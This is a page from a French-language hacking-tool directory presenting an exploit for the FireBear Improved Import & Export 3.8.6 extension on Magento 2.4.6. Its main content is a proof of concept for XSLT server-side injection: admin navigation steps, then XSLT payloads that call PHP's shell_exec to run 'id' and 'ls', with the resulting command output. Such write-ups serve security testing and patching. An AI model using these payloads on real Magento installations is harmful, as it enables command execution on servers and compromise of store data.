Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/capture0x/magento-ver.-2.4.6
Vulnerability AnalysisExploitationWeb Application ExploitationPayload Development
GitHubcapture0x/magento-ver.-2.4.6

Magento-ver.-2.4.6

Magento ver. 2.4.6 - XSLT Server Side Injection

Voir le dépôt
4il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Titre de l'exploit : FireBear Studio Improved Import & Export ver. 3.8.6 pour Magento 2.4.6 - Injection XSLT côté serveur

  • Date : 2023-11-17
  • Auteur de l'exploit : tmrswrr
  • Page d'accueil du fournisseur : FireBear Studio
  • Lien du logiciel : FireBear Studio Improved Import & Export
  • Version : FireBear Improved Import & Export ver. 3.8.6
Image Magento Image Magento ## Preuve de concept
  1. Connectez-vous avec les identifiants administrateur à cette URL : https://magento2demo.firebearstudio.com/

  2. Cliquez sur SYSTEM > Import Jobs > Entity Type Widget > click edit

  3. Choisissez Import File Type > XML > Import Source is File

  4. Téléversez un fichier xml quelconque

  5. Cliquez sur XSLT Configuration et écrivez cette charge utile :

    root@kitploit:~
    <?xml version="1.0" encoding="utf-8"?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
        <xsl:value-of select="php:function('shell_exec','id')" />
      </xsl:template>
    </xsl:stylesheet>```
    

** **uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

root@kitploit:~
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','ls')" />
     </xsl:template>
   </xsl:stylesheet>```

**<?xml version="1.0"?>
cron.php
errors
get.php
health_check.php
index.php
media
opt
robots.txt
static
static.php
Télécharger l’outil